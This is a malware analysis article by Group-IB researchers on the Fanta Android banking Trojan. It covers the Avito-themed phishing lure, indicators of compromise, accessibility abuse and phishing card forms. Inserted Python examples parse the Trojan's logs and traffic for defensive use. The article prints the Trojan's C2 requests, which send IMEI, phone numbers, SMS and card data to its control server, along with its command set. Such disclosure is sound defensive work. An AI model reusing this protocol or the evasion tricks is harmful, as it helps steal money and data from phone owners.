Leisya, Fanta: new tricks of an old Android Trojan

One day you want to sell something on Avito and, after posting a detailed description of your item (say, a RAM module), you receive this message:

[Screenshot: the SMS message]

Once you open the link, you see a seemingly innocent page informing you, the happy and successful seller, that the purchase has gone through:

[Screenshot: the phishing page]

Once you click the "Continue" button, an APK file with an icon and a name that inspire trust is downloaded to your Android device. You installed the application, which for some reason asked for AccessibilityService rights, then a couple of windows appeared and quickly disappeared and... that's it.

You go to check your balance, but for some reason your banking application asks for your card details again. After you enter them, something bad happens: for a reason still unclear to you, money starts disappearing from your account. You try to deal with the problem, but your phone resists: it presses the "Back" and "Home" keys by itself, does not close and does not let you take any protective steps. As a result, you are left without money, your item was never bought, you are confused and wonder: what happened?

The answer is simple: you have become a victim of the Android Trojan Fanta, a member of the Flexnet family. How did this happen? Let's explain.

Authors: Andrey Polovinkin, junior malware analysis specialist, and Ivan Pisarev, malware analysis specialist.

Some statistics

The Flexnet family of Android Trojans first became known back in 2015. Over a fairly long period of activity, the family has grown into several subspecies: Fanta, Limebot, Lipton, etc. The Trojan, and the infrastructure associated with it, does not stand still: new, effective distribution schemes are being developed (in our case, phishing pages tailored to a specific seller), and the Trojan's developers follow the current trends in malware writing, adding new functionality that lets them steal money from infected devices more effectively and bypass protection mechanisms.

The campaign described in this article targets users in Russia; a small number of infected devices was recorded in Ukraine, and even fewer in Kazakhstan and Belarus.

Even though Flexnet has been on the Android Trojan scene for more than 4 years and has been studied in detail by many researchers, it is still in good shape. Since January 2019 the potential damage exceeds 35 million rubles, and that is only for the campaigns in Russia. In 2015, various versions of this Android Trojan were sold on underground forums, where the Trojan's source code with a detailed description could also be found. This means that the worldwide damage figures are even more impressive. Not a bad result for such an old-timer, is it?


From selling to scamming

As can be seen in the screenshot of the phishing page of the Avito online classifieds service shown earlier, it was prepared for a specific victim. Apparently, the attackers use one of the Avito parsers, which extracts the seller's phone number and name, as well as the item description. After preparing the page and the APK file, the victim is sent an SMS with their name and a link to a phishing page that contains the description of their item and the amount received from its "sale". By clicking the button, the user receives a malicious APK file: Fanta.

A study of the domain shcet491[.]ru showed that it is delegated to Hostinger's DNS servers:

  • ns1.hostinger.ru
  • ns2.hostinger.ru
  • ns3.hostinger.ru
  • ns4.hostinger.ru

The domain's zone file contains entries pointing to the IP addresses 31.220.23[.]236, 31.220.23[.]243 and 31.220.23[.]235. However, the domain's primary resource record (A record) points to a server with the IP address 178.132.1[.]240.

The IP address 178.132.1[.]240 is located in the Netherlands and belongs to the hoster WorldStream. The IP addresses 31.220.23[.]235, 31.220.23[.]236 and 31.220.23[.]243 are located in the UK and belong to a HOSTINGER shared hosting server. The registrar is openprov-ru. The following domains also resolved to the IP address 178.132.1[.]240:

  • sdelka-ru[.]ru
  • i-tovar-av[.]ru
  • i-av-tovar[.]ru
  • ru-sdelka[.]ru
  • shcet382[.]ru
  • sdelka221[.]ru
  • sdelka211[.]ru
  • vyplata437[.]ru
  • viplata291[.]ru
  • perevod273[.]ru
  • perevod901[.]ru

It should be noted that links of the following form were found on almost all of these domains:

http://(www.){0,1}<%domain%>/[0-9]{7}

This pattern also covers the link from the SMS message. Based on historical data, it was found that one domain corresponds to several links of the pattern described above, which indicates that a single domain was used to distribute the Trojan to several victims.
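As an added example (not code from the article or from Group-IB), the link pattern above and the domains listed in the text can be turned into a simple SMS-side detector; the sample messages are constructed, and the defanged domains are refanged only for matching.

```python
import re

# Distribution domains named in the article (defanged with [.] as on the page).
DISTRIBUTION_DOMAINS = [
    "shcet491[.]ru", "sdelka-ru[.]ru", "i-tovar-av[.]ru", "i-av-tovar[.]ru",
    "ru-sdelka[.]ru", "shcet382[.]ru", "sdelka221[.]ru", "sdelka211[.]ru",
    "vyplata437[.]ru", "viplata291[.]ru", "perevod273[.]ru", "perevod901[.]ru",
]


def refang(domain):
    """Turn the defanged 'example[.]ru' notation back into a real hostname."""
    return domain.replace("[.]", ".")


def build_link_pattern(domains):
    """Compile the article's link shape http://(www.){0,1}<%domain%>/[0-9]{7}
    into one anchored regex over every known distribution domain."""
    alternatives = "|".join(re.escape(refang(d)) for d in domains)
    return re.compile(r"^http://(?:www\.)?(" + alternatives + r")/[0-9]{7}$")


def match_distribution_link(url, domains=DISTRIBUTION_DOMAINS):
    """Return the matched hostname when url has the Fanta distribution shape, else None.
    Only plain http:// is accepted, because that is the shape the article reports."""
    m = build_link_pattern(domains).match(url.strip())
    return m.group(1) if m else None


def extract_links(sms_text):
    """Pull http(s) URLs out of an SMS body, dropping trailing punctuation."""
    return [u.rstrip(".,;!)") for u in re.findall(r"https?://[^\s\"'<>]+", sms_text)]


def scan_sms(sms_text, domains=DISTRIBUTION_DOMAINS):
    """Return [(url, hostname)] for every link in the SMS that matches the pattern."""
    hits = []
    for url in extract_links(sms_text):
        host = match_distribution_link(url, domains)
        if host:
            hits.append((url, host))
    return hits


# Constructed sample messages (not real SMS captured by the article's authors).
SAMPLE_SMS = [
    "Ivan, your RAM module has been bought. Collect payment: http://www.sdelka221.ru/4821973.",
    "Your parcel is at the pickup point: http://example.com/1234567",
    "Deal: http://perevod273.ru/12345 (link too short to match)",
]
```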

Let's jump ahead a little: the Trojan downloaded via the link from the SMS uses the address onuseseddohap[.]club as its control server. This domain was registered on 2019-03-12, and starting from 2019-04-29 APK applications have been interacting with it. Based on data obtained from VirusTotal, 109 applications interacted with this server. The domain itself resolved to the IP address 217.23.14[.]27, located in the Netherlands and belonging to the hoster WorldStream. The registrar is namecheap. The domains bad-racoon[.]club (since 2018-09-25) and bad-racoon[.]live (since 2018-10-25) also resolved to this IP address. More than 80 APK files interacted with the domain bad-racoon[.]club, and more than 100 with bad-racoon[.]live.

In general, the attack proceeds as follows:

[Diagram: general attack flow]

What's under the hood of Fanta?

Like many other Android Trojans, Fanta can read and send SMS messages, make USSD requests, and display its own windows on top of applications (including banking ones). However, the family's functional arsenal has expanded: Fanta has started using the AccessibilityService for various purposes: reading the contents of notifications from other applications, preventing detection and preventing the Trojan from being stopped on the infected device, etc. Fanta works on all Android versions no lower than 4.4. In this article we take a detailed look at the following Fanta sample:

  • MD5: 0826bd11b2c130c4c8ac137e395ac2d4
  • SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
  • SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

Immediately after launch

Immediately after launch, the Trojan hides its icon. The application runs only if the name of the infected device is not in this list:

  • android_x86
  • VirtualBox
  • Nexus 5X (bullhead)
  • Nexus 5 (hammerhead)

This check is performed in the Trojan's main service. At the first launch, the application's configuration parameters are initialised with default values (the storage format of the configuration data and its description are discussed later), and the new infected device is registered with the control server. An HTTP POST request with message type register_bot and information about the infected device (Android version, IMEI, phone number, operator name and the country code the operator is registered in) is sent to the server. The address hXXp://onuseseddohap[.]club/controller.php serves as the control server. In response, the server sends a message containing the fields bot_id, bot_pwd and server; the application stores these values as its CnC server parameters. The server parameter is optional: if the field is not received, Fanta uses the registration address hXXp://onuseseddohap[.]club/controller.php. The ability to change the CnC address solves two problems: spreading the load evenly across several servers (with a large number of infected devices, the load on an unoptimised web server can be high) and falling back to another server if one of the CnC servers fails.

If an error occurs while sending the request, the Trojan repeats the registration procedure after 20 seconds.

Once the device is registered successfully, Fanta shows the following message to the user:

[Screenshot: the "System Security" dialog shown by the Trojan]

Important note: the service is called System Security, which is the name of the Trojan's service, and after clicking the OK button a window with the accessibility settings of the infected device opens, where the user is expected to grant access rights to the malicious service:

[Screenshot: the accessibility settings screen]

As soon as the user enables the Accessibility Service, Fanta gains access to the contents of application windows and the actions performed in them:

[Screenshot: the accessibility service permission screen]

Immediately after obtaining accessibility rights, the Trojan requests device administrator rights and the right to read notifications:

[Screenshot: the administrator and notification access requests]

Using the AccessibilityService, the application emulates button presses, thereby granting itself all the rights it needs.

Fanta creates several database instances (described later) needed to store configuration data, as well as the information collected about the infected device while it runs. To send the collected information, the Trojan creates a recurring task that fetches rows from the database and receives a command from the control server. The interval for contacting the CnC depends on the Android version: on 5.1 the interval is 10 seconds, otherwise 60 seconds.

To receive a command, Fanta makes a getTask request to the control server. In response, the CnC can send one of the following commands:

Command   Description
0         send an SMS message
1         make a phone call or execute a USSD command
2         update the interval parameter
3         update the intercept parameter
6         update the smsManager parameter
9         start collecting SMS messages
11        reset the phone to factory settings
12        enable/disable logging of dialog box creation

Fanta also collects notifications from 70 banking applications, fast payment systems and e-wallets and stores them in the database.

Storing configuration parameters

To store its configuration parameters, Fanta uses the approach standard for the Android platform: Preferences files. The settings are saved in a file named settings. The stored parameters are described in the table below.

Name         Default value                    Possible values     Description
id           0                                integer             bot ID
server       hXXp://onuseseddohap[.]club/     URL                 control server address
pwd          -                                string              server password
interval     20                               integer             sleep interval; sets how long the following operations are delayed:
                                                                  • sending a request about the status of a sent SMS message
                                                                  • fetching a new command from the control server
intercept    all                              all/phone number    if the field equals the string all or a phone number, the received SMS message is intercepted by the application and not shown to the user
smsManager   0                                0/1                 enable/disable the application as the default SMS handler
readDialog   false                            true/false          enable/disable logging of AccessibilityEvent events

Fanta also uses the file smsManager:

Name         Default value                    Possible values     Description
pckg         -                                string              name of the SMS message handler in use

Interaction with databases

During its operation, the Trojan uses two databases. The database named a is used to store the various information collected on the phone. The second database is called fanta.db and stores the settings that control the creation of the phishing windows designed to collect bank card information.

The Trojan uses database a to store the collected information and to log its own actions. The data is stored in the logs table. The table is created with the following SQL query:

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

The database contains the following information:

1. A record of the infected device starting up, with the message Phone is on!

2. Notifications from applications. The message is generated according to the following template:

(<%App Name%>)<%Title%>: <%Notification text%>

3. Bank card data from the phishing forms created by the Trojan. The VIEW_NAME parameter can be one of the following:

  • AliExpress
  • Avito
  • Google Play
  • Other <%App Name%>

The message is logged in the format:

[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>

4. Incoming/outgoing SMS messages in the format:

([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>

5. Information about the package that created a dialog box, in the format:

(<%Package name%>)<%Package information%>
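The five record layouts above can be recognised mechanically when a copy of database a is recovered from a device. The following triage script is an added example (not the article's or the Trojan's code): it creates the logs table with the CREATE statement quoted above, fills it with constructed rows, and classifies each value of column d; full card numbers are masked and the CVV is dropped so the report itself does not carry usable card data.

```python
import re
import sqlite3

# CREATE statement quoted in the article for the "logs" table of database "a".
CREATE_LOGS = ("create table logs ( _id integer primary key autoincrement, "
               "d TEXT, f TEXT, p TEXT, m integer)")

# Record layouts from the article; the Russian labels are part of the Trojan's format.
TIME = r"(\d{2}:\d{2}:\d{2} \d{2}\.\d{2}\.\d{4})"
CARD_RE = re.compile(r"^\[" + TIME + r"\]\((.+?)\) Номер карты:(.*?); Дата:(.*?)/(.*?); CVV: (.*)$")
SMS_RE = re.compile(r"^\(\[" + TIME + r"\] Тип: (Входящее|Исходящее)\) ([^:]+):(.*)$")
NOTIF_RE = re.compile(r"^\((.+?)\)(.+?): (.*)$")   # (<%App Name%>)<%Title%>: <%text%>
PKG_RE = re.compile(r"^\((.+?)\)(.*)$")           # (<%Package name%>)<%Package information%>


def mask_pan(pan):
    """Keep only the BIN and last four digits so a triage report never holds a full PAN."""
    digits = re.sub(r"\D", "", pan)
    if len(digits) < 10:
        return "*" * len(digits)
    return digits[:6] + "*" * (len(digits) - 10) + digits[-4:]


def classify_log_entry(d):
    """Map one value of column d to a structured record. Order matters: the notification
    and package layouts overlap, so the more specific layouts are tried first."""
    m = CARD_RE.match(d)
    if m:  # the CVV (group 6) is deliberately not carried into the record
        return {"kind": "card", "time": m.group(1), "view": m.group(2),
                "pan": mask_pan(m.group(3)), "month": m.group(4), "year": m.group(5)}
    m = SMS_RE.match(d)
    if m:
        direction = "incoming" if m.group(2) == "Входящее" else "outgoing"
        return {"kind": "sms", "time": m.group(1), "direction": direction,
                "number": m.group(3).strip(), "text": m.group(4)}
    m = NOTIF_RE.match(d)
    if m:
        return {"kind": "notification", "app": m.group(1), "title": m.group(2), "text": m.group(3)}
    m = PKG_RE.match(d)
    if m:
        return {"kind": "package", "package": m.group(1), "info": m.group(2)}
    return {"kind": "other", "text": d}


# Constructed rows (d, f, p, m) in the article's formats; not data from a real infection.
SAMPLE_ROWS = [
    ("(Bank App)Transfer: You received 1 000 RUB", "", "", 0),
    ("[12:34:56 01.06.2019](Avito) Номер карты:4111111111111111; Дата:12/24; CVV: 123", "", "", 0),
    ("([12:35:10 01.06.2019] Тип: Входящее) +79001234567:Your code is 4821", "", "+79001234567", 1),
    ("(com.android.settings)Settings", "", "", 0),
]


def load_sample_db():
    """Create database 'a' in memory with the article's schema and the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(CREATE_LOGS)
    conn.executemany("insert into logs (d, f, p, m) values (?, ?, ?, ?)", SAMPLE_ROWS)
    return conn


def triage(conn):
    """Classify every logs row in insertion order."""
    return [classify_log_entry(d) for (d,) in conn.execute("select d from logs order by _id")]


def summary(conn):
    """Count rows per kind, e.g. to see at a glance whether card data was harvested."""
    counts = {}
    for entry in triage(conn):
        counts[entry["kind"]] = counts.get(entry["kind"], 0) + 1
    return counts
```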

Example of the logs table:

[Screenshot: contents of the logs table]

One of Fanta's functions is collecting bank card information. The data is collected by creating phishing windows when banking applications are opened. The Trojan creates each phishing window only once. Whether a window has already been shown to the user is stored in the settings table of the database fanta.db. The table is created with the following SQL query:

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

All fields of the settings table are initialised to 1 by default (create the phishing window). After the user has entered their data, the value is set to 0. Description of the settings table fields:

  • can_login — the field responsible for showing the form when a banking application is opened
  • first_bank — not used
  • can_avito — the field responsible for showing the form when the Avito application is opened
  • can_ali — the field responsible for showing the form when the Aliexpress application is opened
  • can_another — the field responsible for showing the form when any application from this list is opened: Yula, Pandao, Drom Auto, Wallet. Discount and bonus cards, Aviasales, Booking, Trivago
  • can_card — the field responsible for showing the form when Google Play is opened

Interaction with the control server

Network interaction with the control server takes place over HTTP. For networking, Fanta uses the popular Retrofit library. Requests are sent to hXXp://onuseseddohap[.]club/controller.php. The server address can be changed during registration with the server. Cookies may be sent in the server's response. Fanta makes the following requests to the server:

  • Registration of the bot with the control server happens once, at the first launch. The following data about the infected device is sent to the server:
    · Cookie — cookies received from the server (the default value is an empty string)
    · mode — the constant string register_bot
    · prefix — the constant value 2
    · version_sdk — built according to the following template: <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
    · imei — IMEI of the infected device
    · country — code of the country the operator is registered in, in ISO format
    · number — phone number
    · operator — operator name

    Example of a request sent to the server:

    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 144
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>
    

    In response to the request, the server should return a JSON object containing the following parameters:
    · bot_id — ID of the infected device. If bot_id equals 0, Fanta repeats the request.
    · bot_pwd — server password.
    · server — control server address. Optional parameter. If it is not specified, the address stored in the application is used.

    Example of the JSON object:

    {
        "response": [
            {
                "bot_id": <%BOT_ID%>,
                "bot_pwd": <%BOT_PWD%>,
                "server": <%SERVER%>
            }
        ],
        "status": "ok"
    }

  • Request for a command from the server. The following data is sent to the server:
    · Cookie — cookies received from the server
    · bid — id of the infected device received in response to the register_bot request
    · pwd — server password
    · divice_admin — indicates whether administrator rights have been obtained: 1 if they have, otherwise 0
    · Accessibility — state of the accessibility service: 1 if the service is running, otherwise 0
    · SMSManager — indicates whether the Trojan is enabled as the default SMS application
    · screen — indicates the screen state: 1 if the screen is on, otherwise 0

    Example of a request sent to the server:

    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>

    Depending on the command, the server returns a JSON object with different parameters:

    · Command Send an SMS message: the parameters contain the phone number, the SMS text and the ID of the message to be sent. The identifier is used when sending the setSmsStatus message to the server.

    {
        "response": [
            {
                "mode": 0,
                "sms_number": <%SMS_NUMBER%>,
                "sms_text": <%SMS_TEXT%>,
                "sms_id": <%SMS_ID%>
            }
        ],
        "status": "ok"
    }

    · Command Make a phone call or execute a USSD command: the phone number or the command comes in the response body.

    {
        "response": [
            {
                "mode": 1,
                "command": <%TEL_NUMBER%>
            }
        ],
        "status": "ok"
    }

    · Command Change the interval parameter.

    {
        "response": [
            {
                "mode": 2,
                "interval": <%SECONDS%>
            }
        ],
        "status": "ok"
    }

    · Command Change the intercept parameter.

    {
        "response": [
            {
                "mode": 3,
                "intercept": "all"/"telNumber"/<%ANY_STRING%>
            }
        ],
        "status": "ok"
    }

    · Command Change the SmsManager field.

    {
        "response": [
            {
                "mode": 6,
                "enable": 0/1
            }
        ],
        "status": "ok"
    }

    · Command Collect SMS messages from the infected device.

    {
        "response": [
            {
                "mode": 9
            }
        ],
        "status": "ok"
    }

    · Command Reset the phone to factory settings:

    {
        "response": [
            {
                "mode": 11
            }
        ],
        "status": "ok"
    }

    · Command Change the ReadDialog parameter.

    {
        "response": [
            {
                "mode": 12,
                "enable": 0/1
            }
        ],
        "status": "ok"
    }

  • Sending a message of type setSmsStatus. This request is made after the Send an SMS message command has been executed. The request looks like this:

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>

  • Uploading the database contents. One row is transmitted per request. The following data is sent to the server:
    · Cookie — cookies received from the server
    · mode — the constant string setSaveInboxSms
    · bid — id of the infected device received in response to the register_bot request
    · text — text of the current database record (field d of the logs table in database a)
    · number — name of the current database record (field p of the logs table in database a)
    · sms_mode — integer value (field m of the logs table in database a)

    The request looks like this:

    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>

    If the upload succeeds, the row is deleted from the table. Example of the JSON object returned by the server:

    {
        "response":[],
        "status":"ok"
    }
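The four request types and the getTask command codes described above can be decoded from captured traffic for incident analysis. The following decoder is an added example (not the article's or the Trojan's code) that applies the documented rules: a bot_id of 0 means the bot retries registration, a missing server field keeps the stored address, and each sms_id handed out by a send_sms task is tied to the later setSmsStatus report. The session traffic is constructed to match the request and response layouts shown in the article.

```python
import json
from urllib.parse import parse_qs

# getTask command codes and their meaning, as tabulated in the article.
COMMANDS = {
    0: "send_sms", 1: "call_or_ussd", 2: "set_interval", 3: "set_intercept",
    6: "set_sms_manager", 9: "collect_sms", 11: "factory_reset", 12: "set_read_dialog",
}
# Request types (the "mode" form field) the article documents.
REQUEST_MODES = ("register_bot", "getTask", "setSmsStatus", "setSaveInboxSms")
# The built-in registration/control address from the article, kept defanged.
DEFAULT_SERVER = "hXXp://onuseseddohap[.]club/controller.php"


def parse_request_body(body):
    """Decode a captured POST body into a flat dict, or None when 'mode' is not
    a documented request type (so unrelated traffic is not mislabelled)."""
    fields = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    if fields.get("mode") not in REQUEST_MODES:
        return None
    return fields


def parse_registration(raw, stored_server=DEFAULT_SERVER):
    """Apply the article's rules to a register_bot reply: bot_id 0 makes the bot retry,
    a missing 'server' keeps the stored address. Returns (bot_id, bot_pwd, server) or None."""
    doc = json.loads(raw)
    if doc.get("status") != "ok" or not doc.get("response"):
        return None
    item = doc["response"][0]
    bot_id = int(item.get("bot_id", 0))
    if bot_id == 0:
        return None
    return bot_id, str(item.get("bot_pwd", "")), item.get("server") or stored_server


def parse_tasks(raw):
    """Decode a getTask reply into [(command_name, params), ...]; unknown codes are kept."""
    doc = json.loads(raw)
    if doc.get("status") != "ok":
        return []
    tasks = []
    for item in doc.get("response", []):
        mode = item.get("mode")
        params = {k: v for k, v in item.items() if k != "mode"}
        tasks.append((COMMANDS.get(mode, "unknown_mode_%s" % mode), params))
    return tasks


def summarize_session(exchanges):
    """Turn (request_body, response_json) pairs into one event line per request.
    sms_ids handed out by send_sms are remembered so a later setSmsStatus report
    can be tied back to the number the bot was told to text."""
    events, pending_sms = [], {}
    for body, resp in exchanges:
        req = parse_request_body(body)
        if req is None:
            events.append("unrecognised request: %s" % body[:40])
            continue
        mode = req["mode"]
        if mode == "register_bot":
            reg = parse_registration(resp)
            events.append("registered bot_id=%s server=%s" % (reg[0], reg[2]) if reg
                          else "registration rejected (bot_id 0), bot will retry")
        elif mode == "getTask":
            for name, params in parse_tasks(resp):
                if name == "send_sms":
                    pending_sms[str(params.get("sms_id"))] = params.get("sms_number")
                events.append("task %s %s" % (name, json.dumps(params, ensure_ascii=False)))
        elif mode == "setSmsStatus":
            number = pending_sms.pop(req.get("id"), "unknown")
            events.append("sms status for id=%s (to %s): %s" % (req.get("id"), number, req.get("status_sms")))
        elif mode == "setSaveInboxSms":
            events.append("exfiltrated log row: number=%s text=%s" % (req.get("number"), req.get("text")))
    return events


# Constructed sample session (not real traffic); bodies follow the article's layouts.
SAMPLE_SESSION = [
    ("mode=register_bot&prefix=2&version_sdk=Nexus+5%2F5.1.1%28Avit%29&imei=000000000000000"
     "&country=ru&number=%2B79000000000&operator=TestOp",
     '{"response":[{"bot_id":42,"bot_pwd":"s3cret"}],"status":"ok"}'),
    ("mode=getTask&bid=42&pwd=s3cret&divice_admin=1&Accessibility=1&SMSManager=0&screen=1",
     '{"response":[{"mode":0,"sms_number":"900","sms_text":"BALANCE","sms_id":7},'
     '{"mode":3,"intercept":"all"}],"status":"ok"}'),
    ("mode=setSmsStatus&id=7&status_sms=1", '{"response":[],"status":"ok"}'),
    ("mode=setSaveInboxSms&bid=42&text=Balance+100.00&number=900&sms_mode=1",
     '{"response":[],"status":"ok"}'),
]
```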

Interaction with the AccessibilityService

The AccessibilityService was created to make Android devices easier to use for people with disabilities. In most cases, physical interaction is required to work with an application; the AccessibilityService allows it to be performed programmatically. Fanta uses the service to create fake windows on top of banking applications and to prevent the user from opening the system settings and certain applications.

Using the AccessibilityService functionality, the Trojan monitors changes to the elements on the screen of the infected device. As described earlier, Fanta's settings contain a parameter responsible for logging dialog box events: readDialog. If this parameter is set, the name and description of the package that triggered the event are added to the database. When events fire, the Trojan performs the following actions:

  • Emulates pressing the Back and Home keys in the following cases:
    · if the user wants to reboot the device
    · if the user wants to uninstall the "Avito" application or change its access rights
    · if the "Avito" application is mentioned on the page
    · when the Google Play Protect application is opened
    · when pages with AccessibilityService settings are opened
    · when the System Security dialog box appears
    · when the page with the "Draw over other apps" settings is opened
    · when the "Applications", "Recovery and reset", "Data reset", "Reset settings", "Developer panel", "Special. features", "Special features" or "Special rights" pages are opened
    · if the event is generated by certain applications.

    List of applications

    • android
    • Master Lite
    • Clean Master
    • Clean Master for x86 CPU
    • Meizu Application Permission Management
    • MIUI Security
    • Clean Master - Antivirus & Cache and Junk Cleaner
    • Parental controls and GPS: Kaspersky SafeKids
    • Kaspersky Antivirus AppLock & Web Security Beta
    • Virus Cleaner, Antivirus, Cleaner (MAX Security)
    • Mobile AntiVirus Security PRO
    • Avast antivirus and free protection 2019
    • Mobile Security MegaFon
    • AVG Protection for Xperia
    • Mobile Security
    • Malwarebytes Antivirus & Protection
    • Antivirus for Android 2019
    • Security Master - Antivirus, VPN, AppLock, Booster
    • AVG antivirus for Huawei tablet System Manager
    • Samsung Accessibility
    • Samsung Smart Manager
    • Security Manager
    • Speed Assistant
    • Dr.Web
    • Dr.Web Security Space
    • Dr.Web Mobile Control Center
    • Dr.Web Security Space Life
    • Dr.Web Mobile Control Center
    • Antivirus and mobile security (Arabic-language app name)
    • Kaspersky Internet Security: Antivirus and Protection
    • Kaspersky Battery Life: Saver & Booster
    • Kaspersky Endpoint Security - protection and management
    • AVG Antivirus Free 2019 - Protection for Android
    • Antivirus Android
    • Norton Mobile Security and Antivirus
    • Antivirus, firewall, VPN, mobile security
    • Mobile Security: antivirus, VPN, fraud protection
    • Antivirus for Android

  • If permission is requested when sending an SMS message to a short number, Fanta emulates ticking the Remember choice checkbox and pressing the Send button.
  • If an attempt is made to revoke the Trojan's administrator rights, it locks the phone screen.
  • Prevents new administrators from being added.
  • If the Dr.Web antivirus application detects a threat, Fanta emulates pressing the Ignore button.
  • The Trojan emulates pressing the Back and Home buttons if the event is generated by the Samsung Device Care application.
  • Fanta creates phishing windows with forms for entering bank card information if an application from a list of about 30 different online services is launched. Among them: AliExpress, Booking, Avito, the Google Play Market component, Pandao, Drom Auto, etc.

    Phishing forms

    Fanta analyses which applications are running on the infected device. If an application of interest is opened, the Trojan shows a phishing window on top of all others, which is a form for entering bank card information. The user is asked to enter the following data:

    • card number
    • card expiry date
    • CVV
    • cardholder name (not for all banks)

    Depending on the running application, different phishing windows are shown. Below are examples of some of them:

    Aliexpress:

    [Screenshot: Aliexpress phishing form]

    Avito:

    [Screenshot: Avito phishing form]

    For other applications, e.g. Google Play Market, Aviasales, Pandao, Booking, Trivago:

    [Screenshot: generic phishing form]

    How it really was

    Fortunately, the person who received the SMS message described at the beginning of this article turned out to be a cybersecurity specialist. So the real, non-director's-cut version differs from the one told earlier: the person received an interesting SMS and handed it over to the Group-IB Threat Hunting Intelligence team. The result of the attack is this article. A happy ending, isn't it? However, not every story ends so well, and so that yours does not turn into a director's cut with lost money, in most cases it is enough to follow these long-established rules:

    • do not install applications on an Android device from any source other than Google Play
    • when installing an application, pay special attention to the rights it requests
    • pay attention to the extensions of downloaded files
    • install Android OS updates regularly
    • do not visit suspicious resources and do not download files from them
    • do not click links received in SMS messages.

Source: www.habr.com
